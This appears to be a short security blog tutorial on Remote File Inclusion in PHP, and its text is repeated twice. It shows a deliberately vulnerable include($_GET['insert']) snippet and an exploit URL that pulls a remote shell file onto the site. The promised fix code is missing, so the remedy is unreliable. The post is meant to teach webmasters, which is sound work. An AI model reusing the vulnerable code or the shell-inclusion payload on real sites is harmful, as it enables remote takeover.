Hello !
I was wondering, why most of WebMasters don't Fix Vulnerabilities on thier Websites ?. And yet complains from hackers ??. Perhaps they don't know, but, why would they open a website if they don't know ?!! why won't they learn?!
So for that i created this article, to help you learning one way of Fixing your websites Vulnerabilities without needing anyone :D. and todays Vulnerability is : RFI.
A lot of you will ask : what is RFI ?
Answer : RFI is an abbreviation of " Remote File Inclusion ", it's a Vulnerability or Security Error that allowed others (Hackers & Crackers) to include a file (mostly Shell File) to your website in order to hack it of course.
Question : How will they include file in my website without even uploading it ?!!
Answer : too easy !, most of RFI Vulnerability will appear like this :
And in the URL :
www.yourwebsite.com/xxxx.php?yyyy=File
with : xxxx = name of a file ( in here : view.php)
yyyy = in here insert
Ok, now to utilise this Error, i will do like this :
www.yourwebsite.com/xxxx.php?yyyy=http://target.com/shell.txt?
with : http://target.com/shell.txt? : is where the shell was uploaded on format TXT (really important) and in after the sign '?' ( it means apply the php codes inside the file, also really important).
So now to Fix it, you have to make sure that the file is in your server,
to do that :
The code above will make sure that, the file is in your server, and you will avoid the RFI Error.
For time shorting, and to make the article short and understandable, i passed some steps not really important and it won't do anything in the contenu of the article.
I hope you find it easy to understand, and if there any requets, do not hesitate to contact me :).
I was wondering, why most of WebMasters don't Fix Vulnerabilities on thier Websites ?. And yet complains from hackers ??. Perhaps they don't know, but, why would they open a website if they don't know ?!! why won't they learn?!
So for that i created this article, to help you learning one way of Fixing your websites Vulnerabilities without needing anyone :D. and todays Vulnerability is : RFI.
A lot of you will ask : what is RFI ?
Answer : RFI is an abbreviation of " Remote File Inclusion ", it's a Vulnerability or Security Error that allowed others (Hackers & Crackers) to include a file (mostly Shell File) to your website in order to hack it of course.
Question : How will they include file in my website without even uploading it ?!!
Answer : too easy !, most of RFI Vulnerability will appear like this :
<?php // coded by Tahar ZoFix for training porposes if(empty($_GET['insert'])){ echo "Please Choose a File"; } else { include($_GET['insert']); } ?>
And in the URL :
www.yourwebsite.com/xxxx.php?yyyy=File
with : xxxx = name of a file ( in here : view.php)
yyyy = in here insert
Ok, now to utilise this Error, i will do like this :
www.yourwebsite.com/xxxx.php?yyyy=http://target.com/shell.txt?
with : http://target.com/shell.txt? : is where the shell was uploaded on format TXT (really important) and in after the sign '?' ( it means apply the php codes inside the file, also really important).
So now to Fix it, you have to make sure that the file is in your server,
to do that :
<?php |
The code above will make sure that, the file is in your server, and you will avoid the RFI Error.
For time shorting, and to make the article short and understandable, i passed some steps not really important and it won't do anything in the contenu of the article.
I hope you find it easy to understand, and if there any requets, do not hesitate to contact me :).
Lesson By; Tahar ZoFix
Sahara Security Blog.
No comments:
Post a Comment